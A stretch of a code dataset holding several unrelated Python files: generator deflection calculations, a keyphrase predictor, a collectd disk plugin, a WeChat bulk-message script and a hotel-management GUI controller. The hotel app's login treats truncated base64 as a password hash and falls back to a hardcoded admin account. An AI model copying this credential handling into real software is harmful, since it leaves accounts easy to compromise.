rotor\n u_Ar = (q3 * R**2 / E / h_yr) * (1 + Numer / Denom)\n \n # Calculating axial deflection of rotor structure\n \n w_r = rho_Fes * g1 * sin(phi) * a_r * N_r\n mass_st_lam = rho_Fe * 2*pi * (R + 0.5 * h_yr) * len_s * h_yr # mass of rotor yoke steel\n W = g1 * sin(phi) * (mass_st_lam + (V_Cusr * rho_Copper) + M_Fert) / N_r # weight of rotor cylinder\n l_ir = R # length of rotor arm beam at which rotor cylinder acts\n l_iir = R_1\n \n y_Ar = (W * l_ir**3 / 12 / E / I_arm_axi_r) + (w_r * l_iir**4 / 24 / E / I_arm_axi_r) # axial deflection\n \n # Calculating torsional deflection of rotor structure\n \n z_all_r = radians(0.05 * R) # allowable torsional deflection\n z_A_r = (2 * pi * (R - 0.5 * h_yr) * len_s / N_r) * sigma * (l_ir - 0.5 * h_yr)**3 / (3 * E * I_arm_tor_r) # circumferential deflection\n \n # STATOR structure\n \n A_st = len_s * t_s\n a_s = (b_st * d_s) - ((b_st - 2 * t_ws) * (d_s - 2 * t_ws))\n N_st = np.round(n_s)\n theta_s = pi / N_st \n I_st = len_s * t_s**3 / 12\n I_arm_axi_s = ((b_st * d_s**3) - ((b_st - 2 * t_ws) * (d_s - 2 * t_ws)**3)) / 12 # second moment of area of stator arm\n I_arm_tor_s = ((d_s * b_st**3) - ((d_s - 2 * t_ws) * (b_st - 2 * t_ws)**3)) / 12 # second moment of area of rotot arm w.r.t torsion\n R_st = rad_ag + h_s + h_ys * 0.5\n R_1s = R_st - h_ys * 0.5\n k_2 = sqrt(I_st / A_st)\n m2 = (k_2 / R_st)**2\n \n # allowable deflections\n \n b_all_s = 2 * pi * R_o / N_st\n u_all_s = R_st / 10000\n y_all = 2 * len_s / 100 # allowable axial deflection\n z_all_s = radians(0.05 * R_st) # allowable torsional deflection\n \n # Calculating radial deflection according to McDonald's\n \n Numers = R_st**3 * ((0.25 * (sin(theta_s) - (theta_s * cos(theta_s))) / (sin(theta_s))**2) - (0.5 / sin(theta_s)) + (0.5 / theta_s))\n Povs = ((theta_s / (sin(theta_s))**2) + 1 / tan(theta_s)) * ((0.25 * R_st / A_st) + (0.25 * R_st**3 / I_st))\n Qovs = R_st**3 / (2 * I_st * theta_s * (m2 + 1))\n Lovs = (R_1s - R_o) * 0.5 / a_s\n Denoms = I_st * (Povs - Qovs + Lovs)\n R_out = R / 0.995 + h_s + h_ys\n u_As = (q3 * R_st**2 / E / t_s) * (1 + Numers / Denoms)\n \n # Calculating axial deflection according to McDonald\n \n l_is = R_st - R_o\n l_iis = l_is\n l_iiis = l_is # length of rotor arm beam at which self-weight acts\n mass_st_lam_s = M_Fest + pi * len_s * rho_Fe * ((R_st + 0.5 * h_ys)**2 - (R_st - 0.5 * h_ys)**2)\n W_is = g1 * sin(phi) * (rho_Fes * len_s * d_s**2 * 0.5) # weight of rotor cylinder \n W_iis = g1 * sin(phi) * (V_Cuss * rho_Copper + mass_st_lam_s) / 2/N_st\n w_s = rho_Fes * g1 * sin(phi) * a_s * N_st\n \n X_comp1 = W_is * l_is**3 / (12 * E * I_arm_axi_s)\n X_comp2 = W_iis * l_iis**4 / (24 * E * I_arm_axi_s)\n X_comp3 = w_s * l_iiis**4 / (24 * E * I_arm_axi_s)\n \n y_As = X_comp1 + X_comp2 + X_comp3 # axial deflection\n \n # Calculating torsional deflection\n \n z_A_s = 2 * pi * (R_st + 0.5 * t_s) * len_s / (2 * N_st) * sigma * (l_is + 0.5 * t_s)**3 / (3 * E * I_arm_tor_s)\n \n # tangential stress constraints\n \n TC1 = T / (2 * pi * sigma)\n TC2 = R**2 * len_s\n TC3 = R_st**2 * len_s\n \n # Calculating inactive mass and total mass\n \n mass_stru_steel = 2 * N_st * (R_1s - R_o) * a_s * rho_Fes\n Structural_mass = mass_stru_steel + (N_r * (R_1 - R_o) * a_r * rho_Fes)\n Mass = Copper + Iron + Structural_mass\n \n # Calculating mass moments of inertia and center of mass\n I = np.zeros(3)\n I[0] = 0.50 * Mass * R_out**2\n I[1] = 0.25 * Mass * R_out**2 + Mass * len_s**2 / 12\n I[2] = I[1]\n cm = np.zeros(3)\n cm[0] = shaft_cm[0] + shaft_length / 2. + len_s / 2\n cm[1] = shaft_cm[1]\n cm[2] = shaft_cm[2]\n \n return B_symax, B_tmax, B_rymax, B_gfm, B_g, B_pc, N_s, b_s, b_t, A_Cuscalc, A_Curcalc, b_p, \\\n h_p, p, E_s, f, I_s, R_s, L_m, A_1, J_s, R_r, Losses, Load_mmf_ratio, Power_ratio, \\\n n_brushes, J_f, K_rad, gen_eff, S, Slot_aspect_ratio, Copper, Iron, u_Ar, y_Ar, \\\n z_A_r, u_As, y_As, z_A_s, u_all_r, u_all_s, y_all, z_all_s, z_all_r, b_all_s, b_all_r, TC1, \\\n TC2, TC3, R_out, Structural_mass, Mass, cm, I\n\n\n'''\n # Unpack outputs\n rad_ag = inputs['rad_ag']\n l_s = inputs['l_s']\n h_s = inputs['h_s']\n tau_p = inputs['tau_p']\n N_f = inputs['N_f']\n I_f = inputs['I_f']\n h_ys = inputs['h_ys']\n h_yr = inputs['h_yr']\n machine_rating = inputs['machine_rating']\n n_nom = inputs['n_nom']\n Torque = inputs['Torque']\n \n b_st = inputs['b_st']\n d_s = inputs['d_s']\n t_ws = inputs['t_ws']\n n_r = inputs['n_r']\n n_s = inputs['n_s']\n b_r = inputs['b_r']\n d_r = inputs['d_r']\n t_wr = inputs['t_wr']\n \n R_o = inputs['R_o']\n rho_Fe = inputs['rho_Fe']\n rho_Copper = inputs['rho_Copper']\n rho_Fes = inputs['rho_Fes']\n shaft_cm = inputs['shaft_cm']\n shaft_length = inputs['shaft_length']\n'''\n","sub_path":"wisdem/drivetrainse/eesgSE.py","file_name":"eesgSE.py","file_ext":"py","file_size_in_byte":22366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"212804304","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nfrom evaluate import evaluate_beam_search,predict_beam_search\nimport logging\nimport numpy as np\n\nimport config\nimport utils\n\nimport torch\nimport torch.nn as nn\nfrom torch import cuda\n\nfrom beam_search import SequenceGenerator\nfrom pykp.dataloader import KeyphraseDataLoader\nfrom train import load_data_vocab, init_model, init_optimizer_criterion\nfrom utils import Progbar, plot_learning_curve_and_write_csv\nimport pykp.io\nimport pykp\nfrom pykp.io import KeyphraseDatasetTorchText, KeyphraseDataset\n\n__author__ = \"Malar Invention\"\n__email__ = \"malarkannan.invention@gmail.com\"\n\nlogger = logging.getLogger()\n\n\ndef generate_dataset():\n test_dataset_name = 'kp20k'\n src_fields = ['title', 'abstract']\n trg_fields = ['keyword']\n parser = argparse.ArgumentParser(\n description='preprocess_testset.py',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # **Preprocess Options**\n parser.add_argument('-source_dataset_root_dir', default='test/',\n help=\"The path to the source data (raw json).\")\n\n parser.add_argument('-output_path_prefix', default='data/',\n help=\"Output file for the prepared data\")\n\n config.preprocess_opts(parser)\n opt = parser.parse_args([])\n\n print(\"Loading Vocab...\")\n opt.vocab_path = os.path.join(opt.output_path_prefix, 'kp20k', 'kp20k.vocab.pt')\n print(os.path.abspath(opt.vocab_path))\n word2id, id2word, vocab = torch.load(opt.vocab_path, 'rb')\n print('Vocab size = %d' % len(vocab))\n\n # for test_dataset_name in test_dataset_names:\n opt.source_test_file = os.path.join(opt.source_dataset_root_dir, '%s_testing.json' % (test_dataset_name))\n\n # output path for exporting the processed dataset\n opt.output_path = os.path.join(opt.output_path_prefix, test_dataset_name)\n if not os.path.exists(opt.output_path):\n os.makedirs(opt.output_path)\n\n print(\"Loading test data...\")\n\n tokenized_test_pairs = pykp.io.load_src_trgs_pairs(source_json_path=opt.source_test_file,\n dataset_name=test_dataset_name,\n src_fields=src_fields,\n trg_fields=trg_fields,\n valid_check=True,\n opt=opt)\n\n print(\"Exporting complete dataset\")\n\n # pykp.io.process_and_export_dataset(tokenized_test_pairs,\n # word2id, id2word,\n # opt,\n # opt.output_path,\n # dataset_name=test_dataset_name,\n # data_type='test')\n return pykp.io.process_dataset(tokenized_test_pairs,\n word2id, id2word,\n opt,\n opt.output_path,\n dataset_name=test_dataset_name,\n data_type='test')\n\n\nclass KeyphrasePredictor(object):\n \"\"\"docstring for KeyphrasePredictor.\"\"\"\n def __init__(self):\n super(KeyphrasePredictor, self).__init__()\n self.model_opts = config.init_opt(description='predictor')\n # self.vocab_path = self.model_opts.vocab#os.path.join(self.model_opts.data, 'kp20k', 'kp20k.vocab.pt')\n # parser = argparse.ArgumentParser(description='predictor',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # config.preprocess_opts(parser)\n # self.opt = parser.parse_args([])\n self.load()\n\n def load(self):\n word2id, id2word, vocab = torch.load(self.model_opts.vocab, 'rb')\n self.model_opts.word2id = word2id\n self.model_opts.id2word = id2word\n self.model_opts.vocab = vocab\n self.model = init_model(self.model_opts)\n self.generator = SequenceGenerator(self.model,\n eos_id=self.model_opts.word2id[pykp.io.EOS_WORD],\n beam_size=self.model_opts.beam_size,\n max_sequence_length=self.model_opts.max_sent_length\n )\n\n\n\n def preprocess_input(self,src_str):\n test_dataset_name='kp20k'\n clean_src_str = self.preprocess_query(src_str)\n tokenized_test_pairs = pykp.io.get_tokenized_pairs(clean_src_str,self.model_opts,True)\n return pykp.io.process_dataset(tokenized_test_pairs,\n self.model_opts.word2id, self.model_opts.id2word,\n self.model_opts,\n dataset_name=test_dataset_name,\n data_type='test')\n\n def process(self,input_str,top_n=8):\n one2one,one2many = self.preprocess_input(input_str)\n # test_data_loaders, word2id, id2word, vocab = load_vocab_and_testsets(self.opt,one2one,one2many)\n pin_memory = torch.cuda.is_available()\n testset_name = 'kp20k'\n logger.info(\"Loading test dataset %s\" % testset_name)\n # testset_path = os.path.join(opt.test_dataset_root_path, testset_name, testset_name + '.test.one2many.pt')\n # test_one2many = torch.load(testset_path, 'wb')\n test_one2many_dataset = KeyphraseDataset(one2many, word2id=self.model_opts.word2id, id2word=self.model_opts.id2word, type='one2many', include_original=True)\n test_one2many_loader = KeyphraseDataLoader(dataset=test_one2many_dataset,\n collate_fn=test_one2many_dataset.collate_fn_one2many,\n num_workers=self.model_opts.batch_workers,\n max_batch_example=self.model_opts.beam_search_batch_example,\n max_batch_pair=self.model_opts.beam_search_batch_size,\n pin_memory=pin_memory,\n shuffle=False)\n # test_one2many_loaders = [test_one2many_loader]\n # for testset_name, test_data_loader in zip(['kp20k'], test_one2many_loaders):\n # test_data_loader = test_one2many_loader\n logger.info('Evaluating %s' % testset_name)\n output = predict_beam_search(self.generator, test_one2many_loader, self.model_opts,\n title='test_%s' % testset_name,\n predict_save_path=None)#opt.pred_path + '/%s_test_result/' % (testset_name))\n\n return output[:top_n]\n\n def removeSpecialChars(self, inputstring):\n import string\n translator = str.maketrans('', '', string.punctuation.replace('-',''))\n # inputstring = 'string with \"punctuation\" inside of it! Does this work? I hope so.'\n # print('hello', inputstring)\n inputstring = inputstring.decode('utf-8').translate(translator)\n return inputstring\n\n def preprocess_query(self, inputstring):\n inputstring = inputstring.lower().strip().encode('ascii',errors='ignore')\n inputstring = self.removeSpecialChars(inputstring)\n inputstring = self.removeWhiteSpace(inputstring)\n return inputstring\n\n def removeWhiteSpace(self, inputstring):\n outputstring = \" \".join(inputstring.split())\n return outputstring\n\n\ndef load_vocab_and_testsets(opt,test_one2one,test_one2many):\n logger.info(\"Loading vocab from disk: %s\" % (opt.vocab))\n word2id, id2word, vocab = torch.load(opt.vocab, 'rb')\n opt.word2id = word2id\n opt.id2word = id2word\n opt.vocab = vocab\n logger.info('#(vocab)=%d' % len(vocab))\n logger.info('#(vocab used)=%d' % opt.vocab_size)\n\n pin_memory = torch.cuda.is_available()\n test_one2many_loaders = []\n\n for testset_name in ['kp20k']:\n logger.info(\"Loading test dataset %s\" % testset_name)\n # testset_path = os.path.join(opt.test_dataset_root_path, testset_name, testset_name + '.test.one2many.pt')\n # test_one2many = torch.load(testset_path, 'wb')\n test_one2many_dataset = KeyphraseDataset(test_one2many, word2id=word2id, id2word=id2word, type='one2many', include_original=True)\n test_one2many_loader = KeyphraseDataLoader(dataset=test_one2many_dataset,\n collate_fn=test_one2many_dataset.collate_fn_one2many,\n num_workers=opt.batch_workers,\n max_batch_example=opt.beam_search_batch_example,\n max_batch_pair=opt.beam_search_batch_size,\n pin_memory=pin_memory,\n shuffle=False)\n\n test_one2many_loaders.append(test_one2many_loader)\n logger.info('#(test data size: #(one2many pair)=%d, #(one2one pair)=%d, #(batch)=%d' % (len(test_one2many_loader.dataset), test_one2many_loader.one2one_number(), len(test_one2many_loader)))\n logger.info('*' * 50)\n\n return test_one2many_loaders, word2id, id2word, vocab\n\n\ndef main():\n opt = config.init_opt(description='predict_keyphrase.py')\n logger = config.init_logging('predict_keyphrase', opt.exp_path + '/output.log', redirect_to_stdout=False)\n\n logger.info('EXP_PATH : ' + opt.exp_path)\n\n logger.info('Parameters:')\n [logger.info('%s : %s' % (k, str(v))) for k, v in opt.__dict__.items()]\n\n logger.info('====================== Checking GPU Availability =========================')\n if torch.cuda.is_available():\n if isinstance(opt.device_ids, int):\n opt.device_ids = [opt.device_ids]\n logger.info('Running on %s! devices=%s' % ('MULTIPLE GPUs' if len(opt.device_ids) > 1 else '1 GPU', str(opt.device_ids)))\n else:\n logger.info('Running on CPU!')\n\n try:\n one2one,one2many = generate_dataset()\n test_data_loaders, word2id, id2word, vocab = load_vocab_and_testsets(opt,one2one,one2many)\n model = init_model(opt)\n generator = SequenceGenerator(model,\n eos_id=opt.word2id[pykp.io.EOS_WORD],\n beam_size=opt.beam_size,\n max_sequence_length=opt.max_sent_length\n )\n\n for testset_name, test_data_loader in zip(['kp20k'], test_data_loaders):\n logger.info('Evaluating %s' % testset_name)\n output = predict_beam_search(generator, test_data_loader, opt,\n title='test_%s' % testset_name,\n predict_save_path=None)#opt.pred_path + '/%s_test_result/' % (testset_name))\n print(output)\n except Exception as e:\n logger.error(e, exc_info=True)\n\ndef main():\n import pandas as pd\n # import sys\n # sys.argv = 'python -data data_custom/kp20k/kp20k -vocab data_custom/kp20k/kp20k.vocab.pt -exp_path \"./exp-custom/attn_general.input_feeding.copy/%s.%s\" -train_from \"exp-custom/attn_general.input_feeding.copy/kp20k-custom.ml.copy.20190102-100747/model/kp20k-custom.ml.copy.epoch=5.batch=40.total_batch=480.model\" -model_path \"./model/attn_general.input_feeding.copy/%s.%s\" -pred_path \"./pred-custom/attn_general.input_feeding.copy/%s.%s\" -exp \"kp20k-custom\" -batch_size 256 -bidirectional -copy_attention -beam_size 16 -beam_search_batch_size 32 -train_ml -attention_mode general -input_feeding -min_src_seq_length 5 -vocab_size 2107 -device_ids 0'.replace('\"','').split(' ')\n kp = KeyphrasePredictor()\n data = pd.read_csv('./kbsearch.solrcore2.csv',encoding='utf-8')\n extract_products = lambda x:';'.join(kp.process(x))\n extract_products(data['question'].iloc[1])\n data['products'] = data['question'].apply(extract_products)\n data.to_csv('output.csv')\n\nif __name__ == '__main__':\n main()\n # kp = KeyphrasePredictor()\n # kp.process('what would you charge me on pay order non-correspondent bank for privilege special scheme savings account')\n","sub_path":"predict_keyphrase.py","file_name":"predict_keyphrase.py","file_ext":"py","file_size_in_byte":12346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"391506864","text":"#!/usr/bin/env python\n#coding:utf-8\n'''\nThis plugin is use to collect information of disk utilization!\nYou need to install systate on your system!\n'''\n\nimport os\n\nimport collectd\n\n\nNAME = 'disk_utilization'\nVERBOSE = True\n\ndef get_disk_utilization():\n data_name = []\n data_num = []\n count = 0\n for line in os.popen('iostat -d -x -k 1 1').readlines():\n if count == 3:\n data_1 = line.split()\n data_num.append(data_1[-1])\n if count == 2:\n data_2 = line.split()\n data_name.append(data_2[-1][1:])\n count += 1\n return zip(data_name, data_num)\n\ndef log(t, message):\n \"\"\" Log messages to collectd logger\n \"\"\"\n if t == 'err':\n collectd.error('{0}: {1}'.format(NAME, message))\n elif t == 'warn':\n collectd.warning('{0}: {1}'.format(NAME, message))\n elif t == 'verb':\n if VERBOSE:\n collectd.info('{0}: {1}'.format(NAME, message))\n else:\n collectd.info('{0}: {1}'.format(NAME, message))\n\ndef configure_callback(conf):\n \"\"\" Config data from collectd\n \"\"\"\n log('verb', 'configure_callback Running')\n global NAME, VERBOSE\n for node in conf.children:\n if node.key == 'Name':\n NAME = node.values[0]\n elif node.key == 'Verbose':\n if node.values[0] == 'False':\n VERBOSE = False\n else:\n log('warn', 'Unknown config key: {0}'.format(node.key))\n\n\ndef read_callback():\n \"\"\" Prepare data for collectd\n \"\"\"\n log('verb', 'read_callback Running')\n\n stats = get_disk_utilization()\n\n if not stats:\n log('verb', 'No statistics received')\n return\n\n for metric,values in stats:\n log('verb', 'Sending value: {0} {1}'.format(metric, values))\n value = collectd.Values(plugin=NAME)\n value.type = 'percent'\n value.type_instance = metric\n value.values = [str(values)]\n value.dispatch()\n\ncollectd.register_config(configure_callback)\ncollectd.warning('Initialising {0}'.format(NAME))\ncollectd.register_read(read_callback)\n\n\n\n\n","sub_path":"collectd_plugins/disk_utilization.py","file_name":"disk_utilization.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281499442","text":"# 导入项目中所需要的包\n#coding:utf-8\n\nimport pandas as pd\nimport numpy as np\nimport itchat\n\n# 调用login()函数以登录网页微信\nitchat.login()\n\n#不选择自己的账号信息\ndataset = itchat.get_friends(update=True)[1:]\n\n# dataset选择部分列,\ndata = [{'NickName':item['NickName'], 'RemarkName':item['RemarkName'], 'UserName':item['UserName']} for item in dataset]\n\n#转换为dataframe\ndf_all = pd.DataFrame()\nfor i in range(len(data)):\n df = pd.DataFrame([data[i]],index=[data[i]['NickName']])\n df_all =df_all.append(df)\n \n#群发消息\nwhile True:\n usernames=[]\n while len(usernames)==0:\n remarknmae_pre = input('请输入群发成员前缀:')\n df = df_all[df_all[\"RemarkName\"].str.find(remarknmae_pre, start=0, end=None)>=0]\n usernames = df['UserName'].tolist()\n print('群发人数共{}人:'.format(len(usernames)),df['RemarkName'].values.tolist(),'\\n')\n message = input('请输入群发内容:')\n print('\\n')\n confirm =input('是否确认发送(y/n):')\n\n if confirm != 'y':\n print('\\n','再来一次','\\n')\n continue\n else: \n for username in usernames: \n itchat.send(message,toUserName = username)\n print('\\n','发送成功!')\n ","sub_path":"broadcast_msg.py","file_name":"broadcast_msg.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"315199432","text":"#\n\n#===================#\n# by Farhad Sotothe #\n# ----------------- #\n# sotothe@gmail.com #\n#===================# \n\nimport sys\nfrom functools import partial\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom datetime import datetime, date\nimport base64\n\nimport model\nimport view\nimport statics\n\n\nclass Login(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super(Login, self).__init__(parent)\n self.textName = QtWidgets.QLineEdit(self)\n self.textPass = QtWidgets.QLineEdit(self)\n self.textName.setPlaceholderText(\"Username\")\n self.textPass.setPlaceholderText(\"Password\")\n self.textPass.setEchoMode(QtWidgets.QLineEdit.Password)\n self.buttonLogin = QtWidgets.QPushButton('Login', self)\n self.buttonLogin.clicked.connect(self.handleLogin)\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(self.textName)\n layout.addWidget(self.textPass)\n layout.addWidget(self.buttonLogin)\n self.users = self.read_auth_info()\n\n @staticmethod\n def _hash(s):\n bh = base64.b64encode(s.encode())\n return str(bh[:10] + bh[-10:])[2:-1]\n\n def read_auth_info(self):\n auth_path = 'modules/auth'\n try:\n with open(auth_path) as f:\n users = []\n for line in f:\n users.append(eval(line)) \n except:\n users = [{'uname':'admin4', 'passwd':'MTIzNDQ0MTIzNDQ0'}]\n\n return users\n\n def handleLogin(self):\n successful = False\n for u in self.users:\n if self.textName.text() == u.get('uname'):\n if self._hash(self.textPass.text()) == u.get('passwd'):\n successful = True\n self.accept()\n else:\n break\n if not successful:\n QtWidgets.QMessageBox.warning(self, 'Error', 'Wrong username or password')\n\n\nclass Balance_DLG(QtWidgets.QDialog):\n def __init__(self, t, r, arch, db, parent=None):\n super().__init__(parent)\n self._db = db\n self._current = None\n\n # setupUi\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label = QtWidgets.QLabel(self)\n self.label.setObjectName(\"label\")\n self.verticalLayout.addWidget(self.label)\n self.textBrowser = QtWidgets.QTextBrowser(self)\n self.textBrowser.setObjectName(\"textBrowser\")\n self.verticalLayout.addWidget(self.textBrowser)\n self.widget = QtWidgets.QWidget(self)\n self.widget.setObjectName(\"widget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label_2 = QtWidgets.QLabel(self.widget)\n self.label_2.setObjectName(\"label_2\")\n self.horizontalLayout.addWidget(self.label_2)\n self.lineEdit_pay = QtWidgets.QLineEdit(self.widget)\n self.lineEdit_pay.setObjectName(\"lineEdit_pay\")\n self.lineEdit_return = QtWidgets.QLineEdit(self.widget)\n self.lineEdit_return.setObjectName(\"lineEdit_return\")\n self.horizontalLayout.addWidget(self.lineEdit_pay)\n self.horizontalLayout.addWidget(self.lineEdit_return)\n self.pushButton = QtWidgets.QPushButton(self.widget)\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout.addWidget(self.pushButton)\n self.verticalLayout.addWidget(self.widget)\n self.init(t, r)\n self.find(t, r, arch)\n\n # retranslateUi\n _translate = QtCore.QCoreApplication.translate\n self.label.setText(_translate(\"Dialog\", \"Description:\"))\n self.label_2.setText(_translate(\"Dialog\", \"Account balance:\"))\n self.lineEdit_pay.setPlaceholderText(_translate(\"Dialog\", \"Pay\"))\n self.lineEdit_return.setPlaceholderText(_translate(\"Dialog\", \"Return\"))\n self.pushButton.setText(_translate(\"Dialog\", \"Pay\"))\n\n # Actions\n self.pushButton.clicked.connect(self.handle_payment)\n\n def init(self, t, r):\n self.textBrowser.setText(f'''\n Room: {t.item(r,1).text()}\n Arrival: {t.item(r,2).text()}\n Departure: {t.item(r,3).text()}\n Guests: {t.item(r,4).text()}\n Peyment for the room: {t.item(r,5).text()}\n Peyment for the services: {t.item(r,6).text()}\n Account balance: {t.item(r,7).text()}\n Comment: {t.item(r,8).text()}''')\n\n def find(self, t, r, arch):\n for a in arch:\n c1 = a._room_no == t.item(r,1).text()\n c2 = a._start == t.item(r,2).text()\n c3 = a._guests == t.item(r,4).text()\n\n if c1 and c2 and c3:\n self._current = a\n\n def handle_payment(self):\n try:\n pay_ = float(self.lineEdit_pay.text())\n except:\n pay_ = 0\n\n try:\n return_ = float(self.lineEdit_return.text())\n except:\n return_ = 0\n\n self._current.pay(return_-pay_, date.today().strftime(\"%Y/%m/%d\"), self._db)\n self.close()\n\nclass Controller:\n def __init__(self):\n self._app = QtWidgets.QApplication(sys.argv)\n font = QtGui.QFont()\n font.setFamily(font.defaultFamily())\n self._app.setFont(font)\n self._model = model.Model()\n self._view = view.View(QtWidgets.QMainWindow())\n self.signals()\n self.init()\n\n def signals(self):\n self._view.sig_conf_room_insert.connect(self.conf_room_insert)\n self._view.sig_conf_room_update.connect(self.conf_room_update)\n self._view.sig_conf_room_remove.connect(self.conf_room_remove)\n self._view.sig_conf_mini_insert.connect(self.conf_mini_insert)\n self._view.sig_conf_mini_update.connect(self.conf_mini_update)\n self._view.sig_conf_mini_remove.connect(self.conf_mini_remove)\n self._view.sig_checkin_submit.connect(self.checkin_submit)\n self._view.sig_reserve.connect(self.reserve)\n self._view.sig_revoke.connect(self.revoke)\n self._view.sig_expire.connect(self.expire)\n self._view.sig_invoice_changed.connect(self.update_room_invoice)\n self._view.sig_checkout.connect(self.checkout)\n self._view.sig_archive_search.connect(self.archive_search)\n self._view.sig_archive_edit.connect(self.archive_edit)\n\n def init(self):\n self._view.rooms = self._model.rooms\n self._view.minibar = self._model.minibar\n self._view.stays = self._model.stays\n self._view.reservations = self._model.reservations\n self.archive_search()\n self._view.update()\n \n\n # ~~~~~~~~~~~< conf_room >~~~~~~~~~~~\n def conf_room_insert(self):\n new = self._model.Room(self._view.lineEdit_config_room_no.text(),\n self._view.spinBox_config_rooms_beds.value(),\n self._view.checkBox_config_rooms_out_of_service.isChecked(),\n self._view.textEdit_config_rooms_description.toPlainText())\n \n msg = self._model.Room.insert(new, self._model.db.conf)\n if msg:\n self._view.show_message(msg)\n else:\n self._model.rooms.append(new)\n self.init()\n\n def conf_room_update(self):\n t = self._view.tableWidget_config_rooms\n k = t.item(t.currentRow(),0).text()\n\n for r in self._model.rooms:\n if r._number == k:\n break\n\n r._number = self._view.lineEdit_config_room_no.text()\n r._beds = self._view.spinBox_config_rooms_beds.value()\n r._oos = self._view.checkBox_config_rooms_out_of_service.isChecked()\n r._description = self._view.textEdit_config_rooms_description.toPlainText()\n\n r.update(self._model.db.conf)\n self.init()\n\n def conf_room_remove(self):\n t = self._view.tableWidget_config_rooms\n k = t.item(t.currentRow(),0).text()\n \n for r in self._model.rooms:\n if r._number == k:\n break\n\n r.remove(self._model.db.conf)\n self._model.rooms.remove(r)\n self.init()\n\n # ~~~~~~~~~~~< conf_minibar >~~~~~~~~~~~\n def conf_mini_insert(self):\n new = self._model.Mini(self._view.lineEdit_config_minibar_item.text(),\n self._view.lineEdit_config_minibar_price.text(),\n self._view.textEdit_config_minibar_comment.toPlainText())\n \n msg = self._model.Mini.insert(new, self._model.db.conf)\n if msg:\n self._view.show_message(msg)\n else:\n self._model.minibar.append(new)\n self.init()\n\n def conf_mini_update(self):\n t = self._view.tableWidget_config_minibar\n k = t.item(t.currentRow(),0).text()\n\n for m in self._model.minibar:\n if m._item == k:\n break\n\n m._item = self._view.lineEdit_config_minibar_item.text()\n m._price = self._view.lineEdit_config_minibar_price.text()\n\n m.update(self._model.db.conf)\n self.init()\n\n def conf_mini_remove(self):\n t = self._view.tableWidget_config_minibar\n k = t.item(t.currentRow(),0).text()\n\n for m in self._model.minibar:\n if m._item == k:\n break\n\n m.remove(self._model.db.conf)\n self._model.minibar.remove(m)\n self.init()\n\n # ~~~~~~~~~~~< invoice >~~~~~~~~~~~\n def invoice(self):\n inv = []\n d = self._view.new_stay.get('_duration')\n n = 'Night'\n res = '-'\n res_comment = self._view.new_stay.get('res_comment')\n\n if int(d) > 1:\n n += 's'\n\n res_inv = self._view.new_stay.get('_invoice')\n if res_inv:\n inv.append(res_inv[0])\n\n inv.append({\n 'date': date.today().strftime(\"%Y/%m/%d\"),\n 'item': n,\n 'price': self._view.new_stay.get('_price'),\n 'count': d,\n 'paid': self._view.new_stay.get('_payment'),\n 'comment': res\n })\n return inv\n\n # ~~~~~~~~~~~< reserve >~~~~~~~~~~~\n def reserve(self):\n new = self._model.Reservation(self._view.new_stay.get('_room_no'),\n self._view.new_stay.get('_guests'),\n self._view.new_stay.get('_start'),\n self._view.new_stay.get('_end'),\n self._view.new_stay.get('_comment',''),\n self._view.new_stay.get('_price',''),\n self._view.new_stay.get('_prepayment'),\n date.today().strftime(\"%Y/%m/%d\"))\n \n new.insert(self._model.db.working)\n self._model.reservations.append(new)\n # self.init()\n\n # ~~~~~~~~~~~< checkin_submit >~~~~~~~~~~~\n def checkin_submit(self):\n new = self._model.Stay(self._view.new_stay.get('_room_no'),\n self._view.new_stay.get('_guests'),\n self._view.new_stay.get('_start'),\n self._view.new_stay.get('_end'),\n self._view.new_stay.get('_comment',''),\n self.invoice())\n \n new.insert(self._model.db.working)\n self._model.stays.append(new)\n # self.init()\n\n # ~~~~~~~~~~~< room_invoice >~~~~~~~~~~~\n def update_room_invoice(self):\n if self._view.tabWidget.currentIndex() == 2:\n room_number = self._view.comboBox_services_room_search.currentText()\n elif self._view.tabWidget.currentIndex() == 3:\n room_number = self._view.comboBox_checkout_stay_room.currentText()\n\n view_stay = None\n model_stay = None\n\n for s in self._view.stays:\n if s._room_no == room_number:\n view_stay = s\n\n for s in self._model.stays:\n if s._room_no == room_number:\n model_stay = s\n\n if view_stay and model_stay:\n msg = model_stay.update_invoice(view_stay._invoice, self._model.db.working)\n if not msg == '':\n print(msg)\n self._view.show_message(msg)\n\n # ~~~~~~~~~~~< checkout >~~~~~~~~~~~\n def checkout(self):\n room_number = self._view.comboBox_checkout_stay_room.currentText()\n\n for s in self._model.stays:\n if s._room_no == room_number:\n stay = s\n\n try:\n stay.insert(self._model.db.archive, archive=True)\n stay.remove(self._model.db.working)\n self._model.stays.remove(stay)\n except:\n print('There is no such a stay!')\n\n self.init()\n\n # ~~~~~~~~~~~< expire >~~~~~~~~~~~\n def expire(self):\n for r in self._view.reservations:\n if datetime.strptime(r._end, '%Y/%m/%d').date() <= date.today():\n try:\n r.insert(self._model.db.archive)\n r.remove(self._model.db.working)\n self._model.reservations.remove(r)\n except:\n print('There is no such a reservation!')\n \n # ~~~~~~~~~~~< revoke >~~~~~~~~~~~\n def revoke(self):\n res = self._view.current_res\n try:\n res.remove(self._model.db.working)\n self._model.reservations.remove(res)\n except:\n pass\n\n self.init()\n\n # ~~~~~~~~~~~< revoke >~~~~~~~~~~~\n @staticmethod\n def colorize(l):\n if l > 0:\n return statics.colors('red')[0]\n elif l < 0:\n return statics.colors('yellow')[0]\n\n\n # ~~~~~~~~~~~< archive_search 